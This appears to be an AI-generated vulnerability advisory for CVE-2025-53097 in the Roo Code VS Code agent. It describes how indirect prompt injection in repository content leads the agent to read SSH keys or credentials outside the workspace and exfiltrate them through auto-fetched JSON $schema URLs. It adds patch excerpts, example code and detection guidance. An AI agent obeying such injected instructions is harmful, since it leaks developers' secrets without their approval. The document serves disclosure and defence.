CVE-2025-53097 Overview
CVE-2025-53097 affects Roo Code, an AI-powered autonomous coding agent extension for Visual Studio Code. Versions prior to 3.20.3 contain a flaw in the search_files tool that ignores the user setting restricting reads to the VS Code workspace. An attacker capable of injecting a prompt into the agent can read sensitive files outside the workspace and exfiltrate the contents by writing them into a JSON schema. When schema fetching is enabled (the default), the write triggers an outbound network request without prompting the user. The maintainers fixed the issue in version 3.20.3.
Critical Impact
Prompt injection attacks against Roo Code can read arbitrary files outside the VS Code workspace and exfiltrate them via automatic JSON schema network fetches.
Affected Products
- Roo Code VS Code extension versions prior to 3.20.3
- Deployments with default JSON schema fetching enabled in VS Code
- Roocode Roo Code (cpe:2.3:a:roocode:roo_code)
Discovery Timeline
- 2025-06-27 - CVE-2025-53097 published to NVD
- 2025-09-15 - Last updated in NVD database
Technical Details for CVE-2025-53097
Vulnerability Analysis
The vulnerability is classified as Improper Neutralization of Special Elements in Output Used by a Downstream Component [CWE-74]. Roo Code exposes a search_files tool to its agent loop. Users can configure the agent to limit reads to the active VS Code workspace. Prior to 3.20.3, search_files did not enforce this boundary check. An attacker who controls agent prompts, through indirect prompt injection in source files, documentation, or external content, can direct the agent to enumerate paths outside the workspace.
The exfiltration channel chains the read primitive with VS Code's automatic JSON schema resolution. Writing a remote $schema URL into a JSON file causes VS Code to issue an HTTP request to fetch the schema. By embedding stolen file contents into the schema URL or related fields, the attacker triggers an outbound request that leaks data without user approval.
Root Cause
The searchFilesTool implementation in src/core/tools/searchFilesTool.ts did not call isPathOutsideWorkspace to gate access against the alwaysAllowReadOnlyOutsideWorkspace setting. The auto-approve logic that protects other read tools was missing from this code path.
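The missing gate, as an added TypeScript example that is not Roo Code's own code: it reconstructs from the description above how a search_files read should be approved, with the vulnerable decision beside the fixed one. Only isPathOutsideWorkspace and alwaysAllowReadOnlyOutsideWorkspace are names from the page; normalizePosix, decideSearchRead and the alwaysAllowReadOnly flag for in-workspace reads are assumptions.

```typescript
// Added example (not Roo Code's code): the workspace boundary check that
// searchFilesTool lacked before 3.20.3. ReadSettings, normalizePosix and
// decideSearchRead are hypothetical names; paths are POSIX-style strings.
type ReadSettings = {
  alwaysAllowReadOnly: boolean;                 // auto-approve reads inside the workspace (assumed flag)
  alwaysAllowReadOnlyOutsideWorkspace: boolean; // auto-approve reads outside it (setting named on the page)
};
type Decision = "auto-approve" | "ask-user";

// Resolve "." and ".." segments so "/home/u/proj/../.ssh" compares as "/home/u/.ssh".
function normalizePosix(p: string): string {
  const out: string[] = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg);
  }
  return "/" + out.join("/");
}

// True when `target` (absolute, or relative to `cwd`) resolves outside `cwd`.
// The trailing "/" in the prefix test matters: "/home/u/proj-secrets" is not
// inside "/home/u/proj" even though it shares the string prefix.
function isPathOutsideWorkspace(cwd: string, target: string): boolean {
  const root = normalizePosix(cwd);
  const abs = normalizePosix(target.startsWith("/") ? target : root + "/" + target);
  return abs !== root && !abs.startsWith(root + "/");
}

// Fixed behaviour: a path outside the workspace is auto-approved only when the
// separate outside-workspace setting allows it; otherwise the user is asked.
function decideSearchRead(cwd: string, target: string, s: ReadSettings): Decision {
  const outside = isPathOutsideWorkspace(cwd, target);
  const allowed = outside ? s.alwaysAllowReadOnlyOutsideWorkspace : s.alwaysAllowReadOnly;
  return allowed ? "auto-approve" : "ask-user";
}

// Vulnerable behaviour for comparison: the path is never checked, so the
// in-workspace flag alone decides, even for ../../.ssh/id_rsa.
function decideSearchReadVulnerable(s: ReadSettings): Decision {
  return s.alwaysAllowReadOnly ? "auto-approve" : "ask-user";
}
```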
Attack Vector
Exploitation requires the attacker to deliver a prompt to the agent. Prompt injection vectors include malicious comments in third-party repositories, README files, dependency documentation, or any content the agent ingests. Once the injected instructions run, the agent reads sensitive files such as ~/.ssh/id_rsa or cloud credentials and writes them into a JSON schema reference, triggering automatic outbound retrieval by VS Code.
// Patch excerpt: src/core/tools/searchFilesTool.ts
import { getReadablePath } from "../../utils/path"
import { isPathOutsideWorkspace } from "../../utils/pathUtils"
import { regexSearchFiles } from "../../services/ripgrep"
-import { t } from "../../i18n"
export async function searchFilesTool(
cline: Task,
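Review bot: the excerpt stops at the function signature and never shows the guard itself; the only changes visible are the import of isPathOutsideWorkspace and the removed `import { t } from "../../i18n"`. To document the fix, extend the excerpt to the lines inside searchFilesTool where isPathOutsideWorkspace is called and its result is checked against alwaysAllowReadOnlyOutsideWorkspace, and confirm that no remaining t() call in this file depended on the dropped import.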
Source: Roo-Code commit 10b2fb3
A companion patch introduces an alwaysAllowWriteProtected setting and an isProtected message flag to block auto-approving edits to configuration files:
// Patch excerpt: packages/types/src/global-settings.ts
alwaysAllowReadOnlyOutsideWorkspace: z.boolean().optional(),
alwaysAllowWrite: z.boolean().optional(),
alwaysAllowWriteOutsideWorkspace: z.boolean().optional(),
+ alwaysAllowWriteProtected: z.boolean().optional(),
writeDelayMs: z.number().optional(),
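Review bot: alwaysAllowWriteProtected is declared `z.boolean().optional()` with no default, so existing installs will read it as undefined; the consumer must treat undefined as false (no auto-approval of edits to protected files) so the setting fails closed, and that default should be documented beside the field. The isProtected message flag the surrounding text says this patch introduces is not in the excerpt, so the write-protection path is not shown here.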
Source: Roo-Code commit 7d0b22f
Detection Methods for CVE-2025-53097
Indicators of Compromise
- Outbound HTTP/HTTPS requests from VS Code processes to attacker-controlled domains referenced in $schema fields.
- Roo Code agent transcripts showing search_files invocations with absolute paths outside the configured workspace.
- Newly created or modified .json files containing unfamiliar $schema URLs.
Detection Strategies
- Audit Roo Code task logs for search_files calls referencing paths matching ~, /etc, /home, or user credential directories.
- Inspect installed Roo Code extension version and flag any host running a release earlier than 3.20.3.
- Monitor developer endpoints for VS Code child processes initiating connections to non-allowlisted schema hosts.
Monitoring Recommendations
- Forward VS Code and extension telemetry to a centralized log store and alert on anomalous schema-fetch destinations.
- Track changes to JSON files in repositories where Roo Code is active, focusing on $schema URL modifications.
- Review agent prompt sources, including dependency README files and issue trackers, for embedded instructions targeting search_files.
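Triage logic for the indicators above, as an added TypeScript example rather than anything from Roo Code or the page: it flags top-level $schema URLs that point at non-allowlisted hosts or are long enough to carry smuggled file contents, and compares an extension version string against the 3.20.3 fix. The allowlist, the length threshold, the sample JSON documents and the function names are all constructed.

```typescript
// Added example (not Roo Code's code): triage for the $schema exfiltration
// channel and the version check from the detection list. The allowlist and the
// 200-character threshold are constructed values; tune them for your estate.
const SCHEMA_HOST_ALLOWLIST = ["json.schemastore.org", "json-schema.org"];
const MAX_SCHEMA_URL_LEN = 200;
const FIXED_VERSION = [3, 20, 3];

type Finding = { file: string; reason: string };

// Inspect the top-level "$schema" of one JSON document (the field VS Code
// resolves). Relative references and non-HTTP schemes cause no fetch and are
// ignored; input that is not JSON cannot trigger a fetch either.
function checkSchemaField(file: string, json: string): Finding[] {
  const findings: Finding[] = [];
  let doc: unknown;
  try { doc = JSON.parse(json); } catch { return findings; }
  if (doc === null || typeof doc !== "object") return findings;
  const schema = (doc as Record<string, unknown>)["$schema"];
  if (typeof schema !== "string") return findings;
  let url: URL;
  try { url = new URL(schema); } catch { return findings; }
  if (url.protocol !== "http:" && url.protocol !== "https:") return findings;
  if (SCHEMA_HOST_ALLOWLIST.indexOf(url.hostname) === -1) {
    findings.push({ file, reason: `$schema host not allowlisted: ${url.hostname}` });
  }
  if (url.pathname.length + url.search.length > MAX_SCHEMA_URL_LEN) {
    findings.push({ file, reason: "oversized $schema URL, possible embedded file data" });
  }
  return findings;
}

// True for any release earlier than 3.20.3. A pre-release suffix such as
// "-rc1" is dropped, so such a build compares as its base version.
function isVulnerableVersion(version: string): boolean {
  const parts = version.split("-")[0].split(".").map((n) => parseInt(n, 10) || 0);
  while (parts.length < 3) parts.push(0);
  for (let i = 0; i < 3; i++) {
    if (parts[i] < FIXED_VERSION[i]) return true;
    if (parts[i] > FIXED_VERSION[i]) return false;
  }
  return false;
}

// Constructed samples: a benign schemastore reference and a suspicious one
// whose query string carries a long base64-looking payload.
const SAMPLE_FILES: Record<string, string> = {
  "package.json": '{"$schema": "https://json.schemastore.org/package.json", "name": "demo"}',
  "leak.json": '{"$schema": "https://collector.example/s.json?d=' + Array(81).join("QUFB") + '"}',
};

function triageSamples(): Finding[] {
  const all: Finding[] = [];
  for (const f of Object.keys(SAMPLE_FILES)) all.push(...checkSchemaField(f, SAMPLE_FILES[f]));
  return all;
}
```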
How to Mitigate CVE-2025-53097
Immediate Actions Required
- Upgrade Roo Code to version 3.20.3 or later across all developer workstations.
- Disable JSON schema downloads in VS Code by setting json.schemaDownload.enable to false until updates are verified.
- Restrict Roo Code to operate only on trusted repositories and review auto-approve settings for read and write tools.
Patch Information
The fix is delivered in Roo Code 3.20.3. Commit 10b2fb3 adds the workspace boundary check to searchFilesTool, and commit 7d0b22f introduces protections against auto-approving edits to configuration files. See the GitHub Security Advisory GHSA-wr2q-46pg-f228 for full details.
Workarounds
- Set alwaysAllowReadOnlyOutsideWorkspace to false and require manual approval for all read operations.
- Disable VS Code automatic JSON schema fetching to remove the exfiltration channel.
- Run the IDE under an account without access to sensitive files such as SSH keys or cloud credentials.
// VS Code settings.json - reduce exposure until patched
{
  "json.schemaDownload.enable": false,
  "roo-code.alwaysAllowReadOnlyOutsideWorkspace": false,
  "roo-code.alwaysAllowWriteOutsideWorkspace": false
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.